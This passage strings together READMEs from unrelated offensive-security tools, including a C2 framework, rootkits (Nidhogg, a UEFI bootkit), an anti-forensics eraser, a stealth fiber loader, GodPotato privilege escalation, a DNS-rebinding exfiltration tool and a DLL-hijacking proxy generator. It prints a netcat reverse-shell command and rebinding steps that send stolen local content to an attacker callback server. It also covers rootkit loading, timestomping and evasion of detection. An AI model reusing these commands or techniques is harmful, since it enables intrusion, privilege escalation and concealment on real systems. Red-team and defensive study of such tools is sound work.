process won't suffice. Since the injected DLL is not properly signed for this purpose, the Section signature flag of the target process will likely prevent it from being loaded. However, you can temporarily disable the protection on the target process, start monitoring it, and restore the protection right after.
Failed to load module in target process - Error: 577, Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
C:\Temp>tasklist | findstr /i target
target.exe 1337 Services 1 14,160 K
C:\Temp>PPLcontrol.exe get 1337
[+] The process with PID 1337 is a PPL with the Signer type 'WinTcb' (6).
C:\Temp>PPLcontrol.exe unprotect 1337
[+] The process with PID 1337 is no longer a PP(L).
C:\Temp>PPLcontrol.exe protect 1337 PPL WinTcb
[+] The Protection 'PPL-WinTcb' was set on the process with PID 1337, previous protection was: 'None-None'.
[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1337.
Release/x64
(x86
is not supported and will probably never be).BugChecker is a SoftICE-like kernel and user debugger for Windows 11 (and Windows XP as well: it supports Windows versions from XP to 11, both x86 and x64). BugChecker doesn't require a second machine to be connected to the system being debugged, like in the case of WinDbg and KD. This version of BugChecker (unlike the original version developed 20 years ago) leverages the internal and undocumented KD API in NTOSKRNL. KD API allows WinDbg/KD to do calls like read/write virtual memory, read/write registers, place a breakpoint at an address etc.
By contrast, the original BugChecker, like SoftICE as well, used to "take over" the system, by hooking several kernel APIs (both exported and private), taking control of the APIC, sending IPIs etc. This approach increases complexity exponentially (and lowers system stability), since the implementation must be compatible with all the supported versions and sub-version of Windows (at the function signature level) as well as all the possible supported hardware configurations. Moreover, 20 years later, PatchGuard makes this solution impossible.
By contrast, this version of BugChecker, by intercepting calls to KdSendPacket and KdReceivePacket in the kernel, presents itself to the machine being debugged as a second system running an external kernel debugger, but, in reality, everything happens on the same machine. Typically this is achieved by replacing KDCOM.DLL (which is the module that implements serial cable communication for the KD API in Windows) and by starting the system in kernel debugging mode. This approach (inspired by VirtualKD) lowers complexity and increases stability and compatibility (and portability, for example, to ARM - and modularity, since the lower level debugger capabilities are implemented behind KdXxxPacket and could be replaced with a custom implementation). Moreover, the presence of a kernel debugger at boot time (although "fake") makes Windows disable PatchGuard.
At the moment, BugChecker requires a PS/2 keyboard for input and a linear framebuffer to write its output.
Demonstration of BugChecker on Windows 11 22H2, inside VirtualBox 7.0.4. A JavaScript breakpoint condition is written that changes the flow of execution in an user mode thread.
BugChecker running in a very constrained environment: a Raspberry Pi 4 (4GB RAM), via QEMU on Windows XP (512MB RAM). A breakpoint is used to log all the SYSENTER calls from user mode to the kernel. The service index is stored in a JavaScript array.
Running BugChecker directly on bare metal, on an HP Pavilion Dv2000, which is an old PC with a PS/2 keyboard. The OS is Windows 7 Home 32bit.
Make sure that Secure Boot is disabled when installing and using BugChecker. Typically you can re-enable it later. If you are using VMware or VirtualBox, Secure Boot can be disabled in the virtual machine settings.
Consider also enabling legacy boot menu, if using Windows 8, 10 or 11, by using the command: bcdedit /set "{current}" bootmenupolicy legacy. It allows a smoother experience during boot, by allowing to select the BugChecker boot option and then to disable Driver Signature Enforcement at the same time.
The first step is to start Symbol Loader:
If necessary, disable the display drivers, by clicking on the "Disable Display Drvs" button. The same thing can be accomplished in Windows Device Manager. After the display drivers have been disabled, they remain disabled even after a system reboot. They can be re-enabled at any time later when not using BugChecker.
The point here is that BugChecker needs a linear framebuffer with a format of 32 bits-per-pixel, to draw its interface. When disabling the display drivers, Windows dismisses hardware acceleration for drawing its UI and falls back to VGA compatibility mode. If running on bare metal or VMware, you should disable display drivers. If running on VirtualBox, you should disable display drivers or set the vm_screen setting in BugChecker.dat, as described below. If running on QEMU, you don't need to disable display drivers but make sure to specify the "-vga std" display device.
Note that VGA compatibility mode could limit the maximum screen resolution. VMware is limited to a maximum resolution of 1152x864. QEMU with the "-vga std" display device doesn't suffer from this limitation.
Interestingly if BugChecker is installed on a system with more than one graphics card, it is possible to disable the display drivers of only one graphics card, which will be the card connected to the screen that will show the BugChecker UI. The second card (set as the main display) will retain all its 2D and 3D acceleration features, including OpenGL and DirectX support (NOTE: tested on VMware, with Windows 11 and a DisplayLink display).
Then click on "Start Driver", then on "Auto Detect" and finally on "Save". "Auto Detect" should be able to determine width, height, physical address and stride of the framebuffer automatically. However, you can specify these settings manually (don't forget to click on "Save" when finished). If "Stride" is 0, it is calculated as "Width" * 4 automatically when starting the driver. "Address" (i.e. physical address of the framebuffer) can be get obtained in Windows Device Manager, by clicking on "Properties" of the display device, under the "Resources" tab.
Then click on "Callback" in the "KDCOM Hook Method" section, then on "Copy/Replace Kdcom" and finally you can reboot the system.
This setup process has to be done only once and the display drivers can be re-enabled, if necessary. When using BugChecker however the display drivers must be disabled again, if required by your configuration.
The vm_screen setting in BugChecker.dat allows to open the BugChecker debugger UI in VirtualBox without specifying in advance a screen resolution in Symbol Loader and without disabling display drivers.
The idea is to write directly to the I/O ports and to the Command Buffer of the virtual display device in order to obtain the current screen resolution and to notify the hypervisor of any update in the framebuffer.
This solution was inspired by the X.org xf86-video-vmware driver.
This solution works only for VirtualBox VMs and by editing manually the BugChecker.dat file:
This is an experimental feature. In the future, this setting will be automatically added by Symbol Loader.
The command name and syntax are chosen to be as close as possible to those of the original SoftICE for NT:
Note: WDK should be installed in its default location, i.e. X:\WinDDK, where X is the drive where the BugChecker sources are saved.
HardHat is a multiplayer C# .NET-based command and control framework. Designed to aid in red team engagements and penetration testing. HardHat aims to improve the quality of life factors during engagements by providing an easy-to-use but still robust C2 framework.
It contains three primary components, an ASP.NET teamserver, a blazor .NET client, and C# based implants.
Alpha Release - 3/29/23 NOTE: HardHat is in Alpha release; it will have bugs, missing features, and unexpected things will happen. Thank you for trying it, and please report back any issues or missing features so they can be addressed.
Discord Join the community to talk about HardHat C2, Programming, Red teaming and general cyber security things The discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and submit bugs.
documentation can be found at docs
To configure the team server's starting address (where clients will connect), edit the HardHatC2\TeamServer\Properties\LaunchSettings.json changing the "applicationUrl": "https://127.0.0.1:5000" to the desired location and port. start the teamserver with dotnet run from its top-level folder ../HrdHatC2/Teamserver/
Code contributions are welcome feel free to submit feature requests, pull requests or send me your ideas on discord.
Anti Forensics Tool For Red Teamers, Used For Erasing Some Footprints In The Post Exploitation Phase.
Reduces Payload Burnout And Increases Detection Countdown. Can Be Used To Test The capabilities of Your Incident Response / Forensics Teams.
Added:
USNJRnl Execution On All Disk Drives.
Unallocated Space ReWriting.
A Bit of Polishing.
https://github.com/Naranbataar/Corrupt
https://github.com/LloydLabs/delete-self-poc
https://github.com/OsandaMalith/WindowsInternals/blob/master/Unload_Minifilter.c
https://stackoverflow.com/users/15168/jonathan-leffler
https://github.com/GiovanniDicanio/WinReg
A fiber is a unit of execution that must be manually scheduled by the application rather than rely on the priority-based scheduling mechanism built into Windows. Fibers are often called lightweight threads. For more detailed information about what are and how fibers work consult the official documentation. Fibers allow to have multiple execution flows in a single thread, each one with its own registers' state and stack. On the other hand, fibers are invisible to the kernel, which makes them a stealthier (and cheaper) method to execute in-memory code than spawning new threads.
One thread can create multiple fibers, and switch between them at desire by calling the SwitchToFiber function. Before that, the current thread itself must have become a fiber by calling ConvertThreadToFiber since only a fiber can create other fibers. Finally, in order to create a fiber that, when scheduled, executes an in-memory code (for example, after reflectively loaded a PE or some shellcode) it is just needed to make a call to CreateFiber.
The SwitchToFiber function is the most important part of this process and where all the magic occurs. This function allows to schedule one fiber or another, all happening on user space. According to the official documentation, "the SwitchToFiber function saves the state information of the current fiber and restores the state of the specified fiber". This mean that when this function is called, the registers' values and the stack are switched from the current fiber state to the target fiber state, allowing to "hide" the stack of the current fiber once the process is completed. This also allows to continue the execution of the target fiber from the same point where the execution was stopped (the same way that it happens when the scheduler switches between threads according to its own priority logic).
And this is exactly what this simple PoC does:
run()
function exported by the manually mapped dll. This fiber will be known as the payload fiber from now on.This process repeats indefinitely.
The use of fibers may be advantageous for some types of payloads (like a C2 beacon) for some of these reasons:
JMP
or CALL
from the loader pointing to unbacked memory regions.Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:
C:\Users\User\Desktop\Fiber> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"
After that, simply compile both the payload and the loader and run the last one:
C:\Users\User\Desktop\Fiber\payload> cargo build --release
C:\Users\User\Desktop\Fiber\loader> cargo build --release
C:\Users\User\Desktop\Fiber\loader\target\release> loader.exe
There is not much mistery on this PoC execution. All it has to be done is to run the loader and use any tool like ProcessHacker to inspect the thread stack. Since the payload switches back to the control fiber before sleeping, the payload fiber's stack remains hidden most of the time. You will see in the output how the two fibers are consecutively scheduled following the already commented logic.
The code is commented to show how to use, create and schedule fibers. You will notice that both the loader and the payload offered as example are "stuck" on an infinite loop, which allows to indefinitely switch between fibers and continue the execution.
If a different payload wants to be tested, just modify the path located on line 32 of the file src::main.rs of the loader. In that case, the new dll has to export a run(PVOID)
function that will receive as input parameter the address of the control fiber. This function has to switch back to the control fiber in order to call the Sleep function, although you can modify this behavior at will to fit your requirements.
Another way to test this tool with a random payload is to perform IAT hooking to redirect any call to the Sleep function (or any other imported function) made by the payload to a function located on the loader, allowing to switch back to the control fiber when this call occurs. Up to you.
In the following screenshots we can see how the stack of the current threat moves from one private memory region to another as we switch fibers:
Nidhogg is a multi-functional rootkit for red teams. The goal of Nidhogg is to provide an all-in-one and easy-to-use rootkit with multiple helpful functionalities for red team engagements that can be integrated with your C2 framework via a single header file with simple usage, you can see an example here.
Nidhogg can work on any version of x64 Windows 10 and Windows 11.
This repository contains a kernel driver with a C++ header to communicate with it.
Since version v0.3, Nidhogg can be reflectively loaded with kdmapper but because PatchGuard will be automatically triggered if the driver registers callbacks, Nidhogg will not register any callback. Meaning, that if you are loading the driver reflectively these features will be disabled by default:
These are the features known to me that will trigger PatchGuard, you can still use them at your own risk.
It has a very simple usage, just include the header and get started!
#include "Nidhogg.hpp"
int main() {
HANDLE hNidhogg = CreateFile(DRIVER_NAME, GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);
// ...
DWORD result = Nidhogg::ProcessUtils::NidhoggProcessProtect(pids);
// ...
}
To compile the client, you will need to install CMake and Visual Studio 2022 installed and then just run:
cd <NIDHOGG PROJECT DIRECTORY>\Example
mkdir build
cd build
cmake ..
cmake --build .
To compile the project, you will need the following tools:
Clone the repository and build the driver.
To test it in your testing environment run those commands with elevated cmd:
bcdedit /set testsigning on
After rebooting, create a service and run the driver:
sc create nidhogg type= kernel binPath= C:\Path\To\Driver\Nidhogg.sys
sc start nidhogg
To debug the driver in your testing environment run this command with elevated cmd and reboot your computer:
bcdedit /debug on
After the reboot, you can see the debugging messages in tools such as DebugView.
Thanks a lot to those people that contributed to this project:
Based on the history of Potato privilege escalation for 6 years, from the beginning of RottenPotato to the end of JuicyPotatoNG, I discovered a new technology by researching DCOM, which enables privilege escalation in Windows 2012 - Windows 2022, now as long as you have "ImpersonatePrivilege" permission. Then you are "NT AUTHORITY\SYSTEM", usually WEB services and database services have "ImpersonatePrivilege" permissions.
Potato privilege escalation is usually used when we obtain WEB/database privileges. We can elevate a service user with low privileges to "NT AUTHORITY\SYSTEM" privileges. However, the historical Potato has no way to run on the latest Windows system. When I was researching DCOM, I found a new method that can perform privilege escalation. There are some defects in rpcss when dealing with oxid, and rpcss is a service that must be opened by the system. , so it can run on almost any Windows OS, I named it GodPotato
Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11
GodPotato -cmd "cmd /c whoami"
Customize Clsid and execute commands
Execute reverse shell commands
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
zcgonvh
skay
bootlicker is a legacy, extensible UEFI firmware rootkit targeting vmware hypervisor virtual machines. It is designed to achieve initial code execution within the context of the windows kernel, regardless of security settings configured.
bootlicker takes its design from the legacy CosmicStrain, MoonBounce, and ESPECTRE rootkits to achive arbitrary code excution without triggering patchguard or other related security mechanisms.
After initial insertion into a UEFI driver firmware using the the injection utility, the shellcodes EfiMain achieves execution as the host starts up, and inserts a hook into the UEFI firmware's ExitBootServices routine. The ExitBootServices routine will then, on execution, find the source caller of the function, and if it matches WinLoad.EFI, attempts to find the unexported winload.efi!OslArchTransferToKernel routine, which will allow us to att ack the booting kernel before it achieves its initial execution.
Once OslArchTransferToKernel executes, it will search for the ACPI.SYS driver, find the .rsrc
PE section, and inject a small stager shellcode entrypoint called DrvMain to copy over a larger payload that will act as our kernel implant.
Entirely based upon d_olex / cr4sh's DmaBackdoorBoot
This code is apart of a larger project I've been working on that on / off in between burnout, like most of the concepts I've produced over the years under various aliases, will never see the light of day. Some of the code comments I've been to lazy to strip out that refer to unrelated functiaonlity, despite it being previously present. Do not expect this to work out of the box, some slight modifications are certainly necessary.
rebindMultiA
is a tool to perform a Multiple A Record rebind attack.
rebindmultia.com
is a domain that I've set up to assist with these attacks. It makes every IP its own authoritative nameserver for the domain [IP].ns.rebindmultia.com
. For example, 13.33.33.37.ns.rebindmultia.com
's authoritative nameserver is 13.33.33.37.ip.rebindmultia.com
which resolves (as you might have guessed) to 13.33.33.37
.
The MultiA Record Rebind attack is a variant of DNS Rebinding that weaponizes an attacker's ability to respond with two IP address in response to a DNS request and the browser's tendency to fallback to the second IP in the DNS response when the first one doesn't respond. In this attack, the attacker will configure a malicious DNS server and two malicious HTTP servers. The DNS server will respond with two A records:
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1
The victim browser will then connect to the first IP and begin interacting with the attacker's first malicious HTTP server. This server will respond with a page that contains two iframes, one to /steal
and one to /rebind
. The /steal
iframe will load up a malicious page to reach into the second iframe and grab the content. The /rebind
endpoint, when hit, will issue a 302 redirect to /
and kill the first malicious HTTP server. As a result, when the browser reaches back out to the attacker's HTTP server, it will be met with a closed port. As such, it will fallback to the second IP. Once the target content has been loaded in the second iframe, the first iframe can reach into it, steal the data, and exfiltrate it to the attacker's second malicious HTTP server - the callback server.
This attack only works in a Windows environment. Linux and Mac will default to the private IP first and the attacker's server will never be queried.
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com
.server.py
) parses the requested dns name and returns two A records: 13.33.33.37
and 127.0.0.1
.server.py
) and loads the /parent
page which has two iframes./steal
from the attacker's malicious HTTP server./rebind
which results in a 302 redirect to /
(the HTTP server will exit after this request)./
per the 302
from the attacker's server./
from the attacker's (now dead) HTTP server, but fails to do so.127.0.0.1
. It then reaches out to that server and loads up the page in the iframe.steal
iframe reaches into the newly loaded second iframe and grabs the content.steal
iframe then sends the results back to the attacker's callback server.pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /
If you get this error:
โฌโ[justin@RhynoDroplet:~/p/rebindMultiA]โ[14:26:24]โ[G:master=]
โฐโ>$ python3 server.py
Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'
Then you need to use a more up-to-date version of Python. Python 3.7+.
This must be executed from publically accessible IP.
git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py
Note: This is a work-in-progress prototype, please treat it as such. Pull requests are welcome! You can get your feet wet with good first issues
An easy-to-use library for emulating code in minidump files. Here are some links to posts/videos using dumpulator:
The example below opens StringEncryptionFun_x64.dmp
(download a copy here), allocates some memory and calls the decryption function at 0x140001000
to decrypt the string at 0x140017000
:
from dumpulator import Dumpulator
dp = Dumpulator("StringEncryptionFun_x64.dmp")
temp_addr = dp.allocate(256)
dp.call(0x140001000, [temp_addr, 0x140017000])
decrypted = dp.read_str(temp_addr)
print(f"decrypted: '{decrypted}'")
The StringEncryptionFun_x64.dmp
is collected at the entry point of the tests/StringEncryptionFun
example. You can get the compiled binaries for StringEncryptionFun
here
from dumpulator import Dumpulator
dp = Dumpulator("StringEncryptionFun_x64.dmp", trace=True)
dp.start(dp.regs.rip)
This will create StringEncryptionFun_x64.dmp.trace
with a list of instructions executed and some helpful indications when switching modules etc. Note that tracing significantly slows down emulation and it's mostly meant for debugging.
from dumpulator import Dumpulator
dp = Dumpulator("my.dmp")
buf = dp.call(0x140001000)
dp.read_str(buf, encoding='utf-16')
Say you have the following function:
00007FFFC81C06C0 | mov qword ptr [rsp+0x10],rbx ; prolog_start
00007FFFC81C06C5 | mov qword ptr [rsp+0x18],rsi
00007FFFC81C06CA | push rbp
00007FFFC81C06CB | push rdi
00007FFFC81C06CC | push r14
00007FFFC81C06CE | lea rbp,qword ptr [rsp-0x100]
00007FFFC81C06D6 | sub rsp,0x200 ; prolog_end
00007FFFC81C06DD | mov rax,qword ptr [0x7FFFC8272510]
You only want to execute the prolog and set up some registers:
from dumpulator import Dumpulator
prolog_start = 0x00007FFFC81C06C0
# we want to stop the instruction after the prolog
prolog_end = 0x00007FFFC81C06D6 + 7
dp = Dumpulator("my.dmp", quiet=True)
dp.regs.rcx = 0x1337
dp.start(start=prolog_start, end=prolog_end)
print(f"rsp: {hex(dp.regs.rsp)}")
The quiet
flag suppresses the logs about DLLs loaded and memory regions set up (for use in scripts where you want to reduce log spam).
You can (re)implement syscalls by using the @syscall
decorator:
from dumpulator import *
from dumpulator.native import *
from dumpulator.handles import *
from dumpulator.memory import *
@syscall
def ZwQueryVolumeInformationFile(dp: Dumpulator,
FileHandle: HANDLE,
IoStatusBlock: P[IO_STATUS_BLOCK],
FsInformation: PVOID,
Length: ULONG,
FsInformationClass: FSINFOCLASS
):
return STATUS_NOT_IMPLEMENTED
All the syscall function prototypes can be found in ntsyscalls.py. There are also a lot of examples there on how to use the API.
To hook an existing syscall implementation you can do the following:
import dumpulator.ntsyscalls as ntsyscalls
@syscall
def ZwOpenProcess(dp: Dumpulator,
ProcessHandle: Annotated[P[HANDLE], SAL("_Out_")],
DesiredAccess: Annotated[ACCESS_MASK, SAL("_In_")],
ObjectAttributes: Annotated[P[OBJECT_ATTRIBUTES], SAL("_In_")],
ClientId: Annotated[P[CLIENT_ID], SAL("_In_opt_")]
):
process_id = ClientId.read_ptr()
assert process_id == dp.parent_process_id
ProcessHandle.write_ptr(0x1337)
return STATUS_SUCCESS
@syscall
def ZwQueryInformationProcess(dp: Dumpulator,
ProcessHandle: Annotated[HANDLE, SAL("_In_")],
ProcessInformationClass: Annotated[PROCESSINFOCLASS, SAL("_In_")],
ProcessInformation: Annotated[PVOID, SAL("_Out_wri tes_bytes_(ProcessInformationLength)")],
ProcessInformationLength: Annotated[ULONG, SAL("_In_")],
ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
):
if ProcessInformationClass == PROCESSINFOCLASS.ProcessImageFileNameWin32:
if ProcessHandle == dp.NtCurrentProcess():
main_module = dp.modules[dp.modules.main]
image_path = main_module.path
elif ProcessHandle == 0x1337:
image_path = R"C:\Windows\explorer.exe"
else:
raise NotImplementedError()
buffer = UNICODE_STRING.create_buffer(image_path, ProcessInformation)
assert ProcessInformationLength >= len(buffer)
if ReturnLength.ptr:
dp.write_ulong(ReturnLength.ptr, len(buffer))
ProcessInformation.write(buffer)
return STATUS_SUCCESS
return ntsyscal ls.ZwQueryInformationProcess(dp,
ProcessHandle,
ProcessInformationClass,
ProcessInformation,
ProcessInformationLength,
ReturnLength
)
Since v0.2.0
there is support for easily declaring your own structures:
from dumpulator.native import *
class PROCESS_BASIC_INFORMATION(Struct):
ExitStatus: ULONG
PebBaseAddress: PVOID
AffinityMask: KAFFINITY
BasePriority: KPRIORITY
UniqueProcessId: ULONG_PTR
InheritedFromUniqueProcessId: ULONG_PTR
To instantiate these structures you have to use a Dumpulator
instance:
pbi = PROCESS_BASIC_INFORMATION(dp)
assert ProcessInformationLength == Struct.sizeof(pbi)
pbi.ExitStatus = 259 # STILL_ACTIVE
pbi.PebBaseAddress = dp.peb
pbi.AffinityMask = 0xFFFF
pbi.BasePriority = 8
pbi.UniqueProcessId = dp.process_id
pbi.InheritedFromUniqueProcessId = dp.parent_process_id
ProcessInformation.write(bytes(pbi))
if ReturnLength.ptr:
dp.write_ulong(ReturnLength.ptr, Struct.sizeof(pbi))
return STATUS_SUCCESS
If you pass a pointer value as a second argument the structure will be read from memory. You can declare pointers with myptr: P[MY_STRUCT]
and dereferences them with myptr[0]
.
There is a simple x64dbg plugin available called MiniDumpPlugin The minidump command has been integrated into x64dbg since 2022-10-10. To create a dump, pause execution and execute the command MiniDump my.dmp
.
python -m pip install dumpulator
To install from source:
python setup.py install
Install for a development environment:
python setup.py develop
What sets dumpulator apart from sandboxes like speakeasy and qiling is that the full process memory is available. This improves performance because you can emulate large parts of malware without ever leaving unicorn. Additionally only syscalls have to be emulated to provide a realistic Windows environment (since everything actually is a legitimate process environment).
If you have seen the film Spartacus from 1960, you will remember the scene where the Romans are asking for Spartacus to give himself up. The moment the real Spartacus stood up, a lot of others stood up as well and claimed to be him using the "I AM SPARTACUS" phrase.
When a process that is vulnerable to DLL Hijacking is asking for a DLL to be loaded, it's kind of asking "WHO IS VERSION.DLL?" and random directories start claiming "I AM VERSION.DLL" and "NO, I AM VERSION.DLL". And thus, Spartacus.
...but with a twist as Spartacus is utilising the SysInternals Process Monitor and is parsing raw PML log files. You can leave ProcMon running for hours and discover 2nd and 3rd level (ie an app that loads another DLL that loads yet another DLL when you use a specific feature of the parent app) DLL Hijacking vulnerabilities. It will also automatically generate proxy DLLs with all relevant exports for vulnerable DLLs.
version.dll
, Spartacus will create a version.dll.cpp
file for you with all the exports included in it. Then you can insert your payload/execution technique and compile.[Defence]
Monitoring mode trying to identify running applications proxying calls, as in "DLL Hijacking in progress". This is just to get any low hanging fruit and should not be relied upon.DllMain
. This technique was inspired and implemented from the walkthrough described at https://www.redteam.cafe/red-team/dll-sideloading/dll-sideloading-not-by-dllmain, by Shantanu Khandelwal. For this to work Ghidra is required.CreateFile
..dll
.procmon.exe
or procmon64.exe
.Drop Filtered Events
to ensure minimum PML output size.Auto Scroll
.ENTER
.Argument | Description |
---|---|
--pml | Location (file) to store the ProcMon event log file. If the file exists, it will be overwritten. When used with --existing-log it will indicate the event log file to read from and will not be overwritten. |
--pmc | Define a custom ProcMon (PMC) file to use. This file will not be modified and will be used as is. |
--csv | Location (file) to store the CSV output of the execution. This file will include only the DLLs that were marked as NAME_NOT_FOUND, PATH_NOT_FOUND, and were in user-writable locations (it excludes anything in the Windows and Program Files directories) |
--exe | Define process names (comma separated) that you want to track, helpful when you are interested only in a specific process. |
--exports | Location (folder) in which all the proxy DLL files will be saved. Proxy DLL files will only be generated if this argument is used. |
--procmon | Location (file) of the SysInternals Process Monitor procmon.exe or procmon64.exe
|
--proxy-dll-template | Define a DLL template to use for generating the proxy DLL files. Only relevant when --exports is used. All #pragma exports are inserted by replacing the %_PRAGMA_COMMENTS_% string, so make sure your template includes that string in the relevant location. |
--existing-log | Switch to indicate that Spartacus should process an existing ProcMon event log file (PML). To indicate the event log file use --pml , useful when you have been running ProcMon for hours or used it in Boot Logging. |
--all | By default any DLLs in the Windows or Program Files directories will be skipped. Use this to include those directories in the output. |
--detect | Try to identify DLLs that are proxying calls (like 'DLL Hijacking in progress'). This isn't a feature to be relied upon, it's there to get the low hanging fruit. |
--verbose | Enable verbose output. |
--debug | Enable debug output. |
--generate-proxy | Switch to indicate that Spartacus will be creating proxy functions for all identified export functions. |
--ghidra | Used only with --generate-proxy. Absolute path to Ghidra's 'analyzeHeadless.bat' file. |
--dll | Used only with --generate-proxy. Absolute path to the DLL you want to proxy. |
--output-dir | Used only with --generate-proxy. Absolute path to the directory where the solution of the proxy will be stored. This directory should not exist, and will be auto-created. |
--only-proxy | Used only with --generate-proxy. Comma separated string to indicate functions to clone. Such as 'WTSFreeMemory,WTSFreeMemoryExA,WTSSetUserConfigA' |
Collect all events and save them into C:\Data\logs.pml
. All vulnerable DLLs will be saved as C:\Data\VulnerableDLLFiles.csv
and all proxy DLLs in C:\Data\DLLExports
.
--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose
Collect events only for Teams.exe
and OneDrive.exe
.
--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose --exe "Teams.exe,OneDrive.exe"
Collect events only for Teams.exe
and OneDrive.exe
, and use a custom proxy DLL template at C:\Data\myProxySkeleton.cpp
.
--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose --exe "Teams.exe,OneDrive.exe" --proxy-dll-template C:\Data\myProxySkeleton.cpp
Collect events only for Teams.exe
and OneDrive.exe
, but don't generate proxy DLLs.
--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --verbose --exe "Teams.exe,OneDrive.exe"
Parse an existing PML event log output, save output to CSV, and generate proxy DLLs.
--existing-log --pml C:\MyData\SomeBackup.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports
Run in monitoring mode and try to detect any applications that is proxying DLL calls.
--detect
Create proxies for all identified export functions.
--generate-proxy --ghidra C:\ghidra\support\analyzeHeadless.bat --dll C:\Windows\System32\userenv.dll --output-dir C:\Projects\spartacus-wtsapi32 --verbose
Create a proxy only for a specific export function.
--generate-proxy --ghidra C:\ghidra\support\analyzeHeadless.bat --dll C:\Windows\System32\userenv.dll --output-dir C:\Projects\spartacus-wtsapi32 --verbose --only-proxy "ExpandEnvironmentStringsForUserW"
Note: When generating proxies for export functions, the solution that is created also replicates VERSIONINFO
and timestomps the target DLL to match the date of the source one (using PowerShell).
Below is the template that is used when generating proxy DLLs, the generated #pragma
statements are inserted by replacing the %_PRAGMA_COMMENTS_%
string.
The only thing to be aware of is that the pragma
DLL will be using a hardcoded path of its location rather than trying to load it dynamically.
#pragma once
%_PRAGMA_COMMENTS_%
#include <windows.h>
#include <string>
#include <atlstr.h>
VOID Payload() {
// Run your payload here.
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
Payload();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
If you wish to use your own template, just make sure the %_PRAGMA_COMMENTS_%
is in the right place.
Whether it's a typo, a bug, or a new feature, Spartacus is very open to contributions as long as we agree on the following: